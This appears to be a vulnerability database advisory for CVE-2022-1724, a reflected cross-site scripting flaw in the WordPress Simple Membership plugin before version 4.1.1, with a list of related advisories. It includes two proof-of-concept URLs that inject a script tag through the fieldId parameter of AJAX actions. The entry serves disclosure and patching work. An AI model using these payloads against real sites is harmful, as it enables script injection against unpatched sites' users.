Lucene search
CydaveWPEX-ID:96A0A667-9C4B-4EA6-B78A-0681E9A9BBAEHistoryMay 23, 2022 - 12:00 a.m.
Simple Membership < 4.1.1 - Reflected Cross-Site Scripting
2022-05-2300:00:00
cydave
84
0.001 Low
EPSS
Percentile
43.5%
The plugin does not properly sanitise and escape parameters before outputting them back in AJAX actions, leading to Reflected Cross-Site Scripting
https://example.com/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
https://example.com/wp-admin/admin-ajax.php?action=swpm_validate_user_name&fieldId=%22%3Cscript%3Ealert(%22XSS%22);%3C/script%3ERelated
patchstack
patchstack
cve
cve
CVE-2022-1724
2022-06-13 13:15:11
prion
prion
Cross site scripting
2022-06-13 13:15:00
wpvulndb
wpvulndb
Simple Membership < 4.1.1 - Reflected Cross-Site Scripting
2022-05-23 00:00:00
cnvd
cnvd
WordPress Simple Membership plugin跨站脚本漏洞
2022-06-15 00:00:00
nuclei
nuclei
WordPress Simple Membership <4.1.1 - Cross-Site Scripting
2022-06-23 18:14:17
cvelist
cvelist
CVE-2022-1724 Simple Membership < 4.1.1 - Reflected Cross-Site Scripting
2022-06-13 12:42:31
nvd
nvd
CVE-2022-1724
2022-06-13 13:15:11